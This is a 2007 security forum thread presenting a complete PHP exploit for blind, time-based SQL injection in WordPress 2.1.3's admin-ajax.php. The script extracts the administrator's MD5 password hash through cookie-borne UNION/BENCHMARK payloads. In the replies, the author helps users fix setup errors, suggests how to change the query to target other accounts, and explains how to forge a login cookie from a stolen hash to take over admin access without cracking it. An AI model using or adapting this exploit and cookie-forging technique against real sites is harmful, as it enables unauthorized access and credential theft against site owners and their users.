Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
June 1, 2016
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: goofy
New Today: 0
New Yesterday: 1
Overall: 9028

People Online:
Visitors: 366
Members: 0
Total: 366
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> WordPress 2.1.3 sql injection blind fishing exploit Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
WordPress 2.1.3 sql injection blind fishing exploit
PostPosted: Mon May 21, 2007 12:05 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




For using this exploit you need:

1. working php installation
2. run this script as php CLI
3. modify needed parameters in script beginning

Code:

<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================

echo "Target: $url\n";
echo "sql table prefix: $prefix\n";

if(empty($suffix))
{
   $suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";

$hash = get_hash();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
   $len = 32;
   $field = 'user_pass';
   $out = '';
   
   echo "finding hash now ...\n";
   
   for($i = 1; $i < $len + 1; $i ++)
   {
      $ch = get_hashchar($field,$i);
      echo "got $field pos $i --> $ch\n";
      $out .= "$ch";
      echo "current value for $field: $out \n";
   }
   
   echo "\nFinal result: $field=$out\n\n";
   
   return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
   global $prefix, $suffix, $id, $testcnt;
   $char = '';
   $cnt = $testcnt * 4;
   $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
   $ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

   // First let's determine, if it's number or letter
   $inj = sprintf($ipattern, $prefix, $id, ">57");
   $post = sprintf($ppattern, $suffix, $inj, $suffix);
   $letter = test_condition($post);
   
   if($letter)
   {
      $min = 97;
      $max = 102;
      echo "char to find is [a-f]\n";
   }
   else
   {
      $min = 48;
      $max = 57;
      echo "char to find is [0-9]\n";
   }

   $curr = 0;
   
   while(1)
   {
      $area = $max - $min;
      if($area < 2 )
      {
         $inj = sprintf($ipattern, $prefix, $id, "=$max");
         $post = sprintf($ppattern, $suffix, $inj, $suffix);
         $eq = test_condition($post);
         
         if($eq)
         {
            $char = chr($max);
         }
         else
         {
            $char = chr($min);
         }
         
         break;
      }
      
      $half = intval(floor($area / 2));
      $curr = $min + $half;
      
      $inj = sprintf($ipattern, $prefix, $id, ">$curr");
      $post = sprintf($ppattern, $suffix, $inj, $suffix);
      
      $bigger = test_condition($post);
      
      if($bigger)
      {
         $min = $curr;
      }
      else
      {
         $max = $curr;
      }

      echo "curr: $curr--$max--$min\n";
   }
   
   return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
   global $url, $norm_delay;
   $bret = false;
   $maxtry = 10;
   $try = 1;
   
   while(1)
   {
      $start = getmicrotime();
      $buff = make_post($url, $p);
      $end = getmicrotime();
   
      if($buff === '-1')
      {
         break;
      }
      else
      {
         echo "test_condition() - try $try - invalid return value ...\n";
         $try ++;
         if($try > $maxtry)
         {
            die("too many tries - exiting ...\n");
         }
         else
         {
            echo "trying again - try $try ...\n";
         }
      }
   }
   
   $diff = $end - $start;
   $delay = intval($diff * 10);
   
   if($delay > ($norm_delay * 2))
   {
      $bret = true;
   }
   
   return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
   $fa = test_md5delay(1);
   echo "$fa\n";
   $sa = test_md5delay($testcnt);
   echo "$sa\n";
   $fb = test_md5delay(1);
   echo "$fb\n";
   $sb = test_md5delay($testcnt);
   echo "$sb\n";
   $fc = test_md5delay(1);
   echo "$fc\n";
   $sc = test_md5delay($testcnt);
   echo "$sc\n";
   
   $mean_nondelayed = intval(($fa + $fb + $fc) / 3);
   echo "mean nondelayed - $mean_nondelayed dsecs\n";
   $mean_delayed = intval(($sa + $sb + $sc) / 3);
   echo "mean delayed - $mean_delayed dsecs\n";
   
   return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
   global $url, $id, $prefix, $suffix;
   
   // delay in deciseconds
   $delay = -1;
   $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
   $ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
   $inj = sprintf($ipattern, $prefix, $id, $cnt);
   $post = sprintf($ppattern, $suffix, $inj, $suffix);

   $start = getmicrotime();
   $buff = make_post($url, $post);
   $end = getmicrotime();
   
   if(intval($buff) !== -1)
   {
      die("test_md5delay($cnt) - invalid return value, exiting ...");
   }

   $diff = $end - $start;
   $delay = intval($diff * 10);

   return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
    list($usec, $sec) = explode(" ", microtime());
    return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
   $ch = curl_init();
   $timeout = 120;
   curl_setopt ($ch, CURLOPT_URL, $url);
   curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
   
   if(!empty($cookie))
   {
      curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
   }
 
   if(!empty($referer))
   {
      curl_setopt ($ch, CURLOPT_REFERER, $referer);
   }

   if($headers === TRUE)
   {
      curl_setopt ($ch, CURLOPT_HEADER, TRUE);
   }
   else
   {
      curl_setopt ($ch, CURLOPT_HEADER, FALSE);
   }

   $fc = curl_exec($ch);
   curl_close($ch);
   
   return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
   global $outfile;
   
   $buf .= "\n";
   $fh = fopen($outfile, 'ab');
   fwrite($fh, $buf);
   fclose($fh);
   
}
///////////////////////////////////////////////////////////////////////
?>


Enjoy Smile


Last edited by waraxe on Tue May 22, 2007 2:35 am; edited 1 time in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon May 21, 2007 12:24 pm Reply with quote
Sm0ke
Moderator
Moderator
 
Joined: Nov 25, 2006
Posts: 141
Location: Finland




exelent work again Very Happy
View user's profile Send private message
:)
PostPosted: Mon May 21, 2007 11:48 pm Reply with quote
oxygenne
Advanced user
Advanced user
 
Joined: Apr 13, 2005
Posts: 52




Are the hashes salted??
View user's profile Send private message
Re: :)
PostPosted: Tue May 22, 2007 12:23 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




oxygenne wrote:
Are the hashes salted??


Nop, they are good old plain md5 hashes Cool
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 22, 2007 12:32 am Reply with quote
bean703
Regular user
Regular user
 
Joined: Mar 21, 2007
Posts: 22




It's not working I keep getting this:
Quote:
PHP Fatal error: Call to undefined function curl_init() in C:\curl\test.php on
line 240
View user's profile Send private message
PostPosted: Tue May 22, 2007 1:57 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




bean703 wrote:
It's not working I keep getting this:
Quote:
PHP Fatal error: Call to undefined function curl_init() in C:\curl\test.php on
line 240


CURL extension must be loaded. Look at php.ini:

Code:

extension=php_curl.dll


And extensions directory must be defined correctly.
Example:

Code:

; Directory in which the loadable extensions (modules) reside.
extension_dir = "./ext/"
View user's profile Send private message Send e-mail Visit poster's website
What about username they are not all "admin" :) ?
PostPosted: Tue May 22, 2007 3:38 am Reply with quote
_-GORO-_
Beginner
Beginner
 
Joined: May 22, 2007
Posts: 3




Nice work!

What about username they are not all "admin" Smile ?

UNION ALL SELECT 1,2,user_name.... ?????
View user's profile Send private message
Re: What about username they are not all "admin" :
PostPosted: Tue May 22, 2007 9:40 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




_-GORO-_ wrote:
Nice work!

What about username they are not all "admin" Smile ?

UNION ALL SELECT 1,2,user_name.... ?????


One way is to find out ID, which belongs to needed target user.
Another way is to modify attack query.

Orig:

Code:
WHERE ID=%d AND IF


New:

Code:
WHERE display_name=%2527waraxe25%27 AND IF
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 22, 2007 11:01 am Reply with quote
spec
Beginner
Beginner
 
Joined: May 22, 2007
Posts: 4




"your session has expired" "incorrect password" is killing me whenever i edit the cookie to gain access, anyway around this?

excellent work
View user's profile Send private message
PostPosted: Tue May 22, 2007 11:33 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




spec wrote:
"your session has expired" "incorrect password" is killing me whenever i edit the cookie to gain access, anyway around this?

excellent work


Do you know, that in cookie must be double-hashed password?

I mean:

md5(md5($password))
View user's profile Send private message Send e-mail Visit poster's website
Re: What about username they are not all "admin" :
PostPosted: Tue May 22, 2007 11:36 am Reply with quote
_-GORO-_
Beginner
Beginner
 
Joined: May 22, 2007
Posts: 3




waraxe wrote:
_-GORO-_ wrote:
Nice work!

What about username they are not all "admin" Smile ?

UNION ALL SELECT 1,2,user_name.... ?????


One way is to find out ID, which belongs to needed target user.
Another way is to modify attack query.

Orig:

Code:
WHERE ID=%d AND IF


New:

Code:
WHERE display_name=%2527waraxe25%27 AND IF


Normally id for admin is 1, but username not necessary "admin" The goal is to find out username for specific ID. Example you show here does opposite. Smile
View user's profile Send private message
Re: What about username they are not all "admin" :
PostPosted: Tue May 22, 2007 11:45 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I got it Very Happy

This needs some modifications to exploit. If you are interested, then I can make improved exploit with this additional functionality Smile


_-GORO-_ wrote:
waraxe wrote:
_-GORO-_ wrote:
Nice work!

What about username they are not all "admin" Smile ?

UNION ALL SELECT 1,2,user_name.... ?????


One way is to find out ID, which belongs to needed target user.
Another way is to modify attack query.

Orig:

Code:
WHERE ID=%d AND IF


New:

Code:
WHERE display_name=%2527waraxe25%27 AND IF


Normally id for admin is 1, but username not necessary "admin" The goal is to find out username for specific ID. Example you show here does opposite. Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 22, 2007 11:50 am Reply with quote
spec
Beginner
Beginner
 
Joined: May 22, 2007
Posts: 4




waraxe , i read something about that but that not what my wordpress gave me in my cookie whenever i log in, it just has these two lines

Code:
www. myblog .com   FALSE   /path/   FALSE   1211319735   wordpressuser_f7f9ab0e578f2388f870c9b6a88f2999   admin
www. myblog .com   FALSE   /path/   FALSE   1211319735   wordpresspass_f7f9ab0e578f2388f870c9b6a88f2999   665e0b331c6dc4c6d747035199349fee


ignore the spaces between the www,, and path because wp resides in a path but how can double the md5 hashes?
View user's profile Send private message
PostPosted: Tue May 22, 2007 12:02 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Is this the situation:

you want to get admin access to some target and don't have admin's password. But you got admin password md5 hash from database?
And you want manually edit cookies, so you can gain admin access without need for md5 hash cracking?
If so, then just get that md5 hash, you allready have and hash it one more time. And resulting hash (or must I say "double-hash"?) put in cookie, you are editing.

By the way:

http://codex.wordpress.org/WordPress_Cookies

Quote:

When you log into WordPress from http://example.com/wp-login.php, WordPress stores the following two cookies:

Your user name
A double-hashed copy of your password



spec wrote:
waraxe , i read something about that but that not what my wordpress gave me in my cookie whenever i log in, it just has these two lines

Code:
www. myblog .com   FALSE   /path/   FALSE   1211319735   wordpressuser_f7f9ab0e578f2388f870c9b6a88f2999   admin
www. myblog .com   FALSE   /path/   FALSE   1211319735   wordpresspass_f7f9ab0e578f2388f870c9b6a88f2999   665e0b331c6dc4c6d747035199349fee


ignore the spaces between the www,, and path because wp resides in a path but how can double the md5 hashes?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue May 22, 2007 12:06 pm Reply with quote
spec
Beginner
Beginner
 
Joined: May 22, 2007
Posts: 4




you're right waraxe, thanks Smile
View user's profile Send private message
WordPress 2.1.3 sql injection blind fishing exploit
  www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






It book reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.112 Seconds